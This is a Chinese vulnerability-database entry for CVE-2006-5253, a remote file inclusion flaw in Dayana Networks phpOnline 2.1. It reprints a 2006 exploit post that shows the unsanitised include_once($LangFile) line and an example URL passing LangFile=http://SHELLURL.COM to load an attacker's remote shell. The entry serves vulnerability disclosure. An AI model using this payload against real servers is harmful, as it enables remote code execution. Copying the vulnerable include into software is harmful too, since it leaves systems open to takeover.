Dayana Networks phpOnline 'strload.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193218 漏洞类型 未知
发布时间 2006-10-12 更新时间 2006-10-12
CVE编号 CVE-2006-5253 CNNVD-ID CNNVD-200610-193
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/84586
https://cxsecurity.com/issue/WLB-2006100085
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-193
|漏洞详情
DayanaNetworksphpOnline(也称为PHP-Online)2.1的strload.php中的PHP远程文件包含漏洞,远程攻击者可以通过LangFile参数中的URL执行任意PHP代码。
|漏洞EXP
#=======================================================================
=======================
#phponline <=  (LangFile) Remote File Inclusion Exploit
#=======================================================================
========================
#Bug in :index.php
#
#Vlu Code :
#--------------------------------
#
#include_once($LangFile);
#
#
#=======================================================================
=========================
#
#Exploit :
#--------------------------------
#
#htpp://sitename.com/[scerpitPath]/strload.php?LangFile=http://SHELLURL.COM
#
#
#
#=======================================================================
=========================
#Discoverd By : MoHaNdKo
#
#Conatact : xp1o (at) msn (dot) com [email concealed]
#or
#
# wWw.xP10.CoM & wWw.TRyaG.CoM
#
#Greetz : r00tshell ( abo nora ) & 3abdalah & KaBaRa & mahmood_ali & ThE-WoLf-KsA & abu shad & v1per-haCker & MR.WOLF & 
#
#abu melaf & mohagr22 & metoovet & fuck_net & &#957;&#943;&#961;&#949;&#1103;~&#1106;&#940;&#962;&#954;&#949;&#1103; & hitlar gada
#
#
# and all member on xp10.com and tryag.com and lezr.com
========================================================================
==========================

vendor:
http://www.dayanahost.com/file/phponline_2.1.1.zip
|受影响的产品
Dayana Networks Phponline 2.1
|参考资料

来源:XF
名称:phponline-index-file-include(29382)
链接:http://xforce.iss.net/xforce/xfdb/29382
来源:BUGTRAQ
名称:20061005phponline<=(LangFile)RemoteFileInclusionExploit
链接:http://archives.neohapsis.com/archives/bugtraq/2006-10/0085.html
来源:SREASON
名称:1721
链接:http://securityreason.com/securityalert/1721